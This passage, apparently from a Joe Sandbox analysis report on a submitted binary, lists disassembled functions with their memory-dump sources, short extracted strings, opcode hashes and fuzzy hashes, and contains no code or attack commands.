                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )$)$IEND
                                                                                                                          • API String ID: 0-588110143
                                                                                                                          • Opcode ID: 56f2b249dc23dd0772a4dcc478d794ff581fa707e3485ed36c0885aff0d19fc7
                                                                                                                          • Instruction ID: c7d93a8e4f7eff28b0fc95367b0730f0a372647f23de9b43af5a053d68433c6d
                                                                                                                          • Opcode Fuzzy Hash: 56f2b249dc23dd0772a4dcc478d794ff581fa707e3485ed36c0885aff0d19fc7
                                                                                                                          • Instruction Fuzzy Hash: A9E18DB1A087059FE310DF28C88172ABFE0FB94314F144A6DE599973D2DB75EA15CB82
                                                                                                                          Function 00CD1F4D Relevance: 3.3, Strings: 2, Instructions: 763COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 58~o$;n>I
                                                                                                                          • API String ID: 0-2392145157
                                                                                                                          • Opcode ID: 32d733ca39808473e8644082dee414600974081d60f04da5c154d89d86e68166
                                                                                                                          • Instruction ID: 3950c36ec8eb996bb873af8f8293a493d3ef549682fd4442c42a3fbb5be391cf
                                                                                                                          • Opcode Fuzzy Hash: 32d733ca39808473e8644082dee414600974081d60f04da5c154d89d86e68166
                                                                                                                          • Instruction Fuzzy Hash: D4324BF360C2009FE3086E39ED8567ABBE9EFD4720F1A893DE6C5C7744E93198058656
                                                                                                                          Function 00B44040 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($f
                                                                                                                          • API String ID: 0-2038831151
                                                                                                                          • Opcode ID: c9a67a88028ac597f52fa9bec6294329b2e518ecd30f0151b4fd08e59030d082
                                                                                                                          • Instruction ID: 44948e4aa751d9f2f35beff772e6d648d185ac965e2e3020683bf0927c5c4bc8
                                                                                                                          • Opcode Fuzzy Hash: c9a67a88028ac597f52fa9bec6294329b2e518ecd30f0151b4fd08e59030d082
                                                                                                                          • Instruction Fuzzy Hash: AF12B9716083409FC714CF18C890B2EBBE2FB89314F188AACF4959B391D771EA55DB92
                                                                                                                          Function 00B3F620 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: dg$hi
                                                                                                                          • API String ID: 0-2859417413
                                                                                                                          • Opcode ID: 09124e5855fdc04cdc22ff482fe4c2e63ac467ff1fe0c319dbd6602563257309
                                                                                                                          • Instruction ID: 1f9bc39fa641ed70ac8b234aab166ebe26132de82e5292ac975e03fe9490b1d1
                                                                                                                          • Opcode Fuzzy Hash: 09124e5855fdc04cdc22ff482fe4c2e63ac467ff1fe0c319dbd6602563257309
                                                                                                                          • Instruction Fuzzy Hash: F7F19771A18302EFE704CF24D891B2ABBF5FB86345F2499ACF1858B2A1C734D945CB12
                                                                                                                          Function 00B035B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Inf$NaN
                                                                                                                          • API String ID: 0-3500518849
                                                                                                                          • Opcode ID: 7b4168bafb080b65bfc3780f68d6dd4628690f88d86d50bcf2af18e9a42e5505
                                                                                                                          • Instruction ID: bc80d9d99dd6b5a0ca1172f1e59fb89901c0f8a5df677e1858f2e8cec442e234
                                                                                                                          • Opcode Fuzzy Hash: 7b4168bafb080b65bfc3780f68d6dd4628690f88d86d50bcf2af18e9a42e5505
                                                                                                                          • Instruction Fuzzy Hash: 8CD1D271B183119BC704CF28C88461EBBE5EBC8B50F258A6DF999973E0E775DD048B82
                                                                                                                          Function 00B1FFDF Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: BaBc$Ye[g
                                                                                                                          • API String ID: 0-286865133
                                                                                                                          • Opcode ID: a96344a6a900984f2f29cb21496f212ea5179bddc2866f9820898fb4b902b759
                                                                                                                          • Instruction ID: 98bea62644c9949755ee5a57ce63b863f1140175f8ac450e357be0ce2922a333
                                                                                                                          • Opcode Fuzzy Hash: a96344a6a900984f2f29cb21496f212ea5179bddc2866f9820898fb4b902b759
                                                                                                                          • Instruction Fuzzy Hash: 1951DCB16183958BD331EF14D881BABB7E0FF96320F08495DE48E9B652E3749940CB57
                                                                                                                          Function 00C429BA Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @~$}v
                                                                                                                          • API String ID: 0-4002934235
                                                                                                                          • Opcode ID: f76675cf52b78be502ce856bcd798950ea9c1faf3f697a3365b0b787b8f449d0
                                                                                                                          • Instruction ID: 6b42b1e53449a35adb8bc5763710d8d67652c5e213acac2858d317ac7181b9f7
                                                                                                                          • Opcode Fuzzy Hash: f76675cf52b78be502ce856bcd798950ea9c1faf3f697a3365b0b787b8f449d0
                                                                                                                          • Instruction Fuzzy Hash: 035149F3A4C7049BE3046E2DEC84B7ABBE1EFD4320F1A453DE6C587784E67545058686
                                                                                                                          Function 00B05160 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %1.17g
                                                                                                                          • API String ID: 0-1551345525
                                                                                                                          • Opcode ID: 628c5d1044c3e03bae4dfbf716ac86f6268b2e2ac50a29dec1a7ebc1a082726a
                                                                                                                          • Instruction ID: 70cf0b6619219ef7873de31e24cada1b32808666afe31e783fe38e99519e0f3e
                                                                                                                          • Opcode Fuzzy Hash: 628c5d1044c3e03bae4dfbf716ac86f6268b2e2ac50a29dec1a7ebc1a082726a
                                                                                                                          • Instruction Fuzzy Hash: 4022A2B6A08B428BE7358E189880327BFE2EFA0344F1985EDD8594BBD1E771DC44DB41
                                                                                                                          Function 00B312D0 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "
                                                                                                                          • API String ID: 0-123907689
                                                                                                                          • Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                          • Instruction ID: 31686be8d32bf65480c1714f241adbd753afde14c78b917e12a8989a81b0d307
                                                                                                                          • Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                          • Instruction Fuzzy Hash: BDF1F571A083415BC724CF2CC49166BBBE9EFC5354F28CDADE89A97382DA34DD058792
                                                                                                                          Function 00B2AE57 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 3ec3f604affd66c18fded83c1397493861bc49d429c1a5591e0ff8f0732c6e56
                                                                                                                          • Instruction ID: a0ee5f895c134e5f6cb3ca8d3330f244775edddf312a9ea28af5750b107f390a
                                                                                                                          • Opcode Fuzzy Hash: 3ec3f604affd66c18fded83c1397493861bc49d429c1a5591e0ff8f0732c6e56
                                                                                                                          • Instruction Fuzzy Hash: 0BE1BB71508316CBC324DF28D490A6FB7F2FF98782F54899CE4C987260EB34A955CB82
                                                                                                                          Function 00B16EBF Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: d9215bf88abf3e57a3ea9eb7018b0eab08576ef0451335e02aee17fded3b3b46
                                                                                                                          • Instruction ID: 761a6af2c690e77fe46ba79b21d18d4c20a29fb872d7c030ce2780acc005c3ac
                                                                                                                          • Opcode Fuzzy Hash: d9215bf88abf3e57a3ea9eb7018b0eab08576ef0451335e02aee17fded3b3b46
                                                                                                                          • Instruction Fuzzy Hash: 5DF1ADB5A00A01CFC724DF24D881A66B7F6FF49314B548AADE49787A91EB30E955CB40
                                                                                                                          Function 00B27E60 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 1d954b5c072e11be69fe4defc6d2b0c10ae03de80a8573975f0f1dada7385ba8
                                                                                                                          • Instruction ID: fe0b47f1757cf6f347470ea9c1c74ca46257d8b5822a2ed420f8e7efd000caa1
                                                                                                                          • Opcode Fuzzy Hash: 1d954b5c072e11be69fe4defc6d2b0c10ae03de80a8573975f0f1dada7385ba8
                                                                                                                          • Instruction Fuzzy Hash: 01C1E171509320ABD710EF14E882A2BB7F5EF95311F08889CF8C997291E734DD11CBA2
                                                                                                                          Function 00B28D62 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 9fd8020e7a94609b81ec495bb77ce1f465aecdc240b84b168bc0f6934b7f37c9
                                                                                                                          • Instruction ID: 163e7022c25c6989c5654ca6c62cac993b1613451d83bcf2da6a6f696765e7a2
                                                                                                                          • Opcode Fuzzy Hash: 9fd8020e7a94609b81ec495bb77ce1f465aecdc240b84b168bc0f6934b7f37c9
                                                                                                                          • Instruction Fuzzy Hash: 5ED1AF70619302DFD704EF64E89062AB7F5FF89306F4948BCE88A87291DB35E950CB51
                                                                                                                          Function 00B47FC0 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: P
                                                                                                                          • API String ID: 0-3110715001
                                                                                                                          • Opcode ID: e2a67d24ef2a0dd4f4766c6b7aab9a3dcbd4f8b2eccfead40aad2161973c66a5
                                                                                                                          • Instruction ID: a7ebe2ff6fdb28af643352910889958b0dddd9f9dd2c02881fb5cace51d9a3e3
                                                                                                                          • Opcode Fuzzy Hash: e2a67d24ef2a0dd4f4766c6b7aab9a3dcbd4f8b2eccfead40aad2161973c66a5
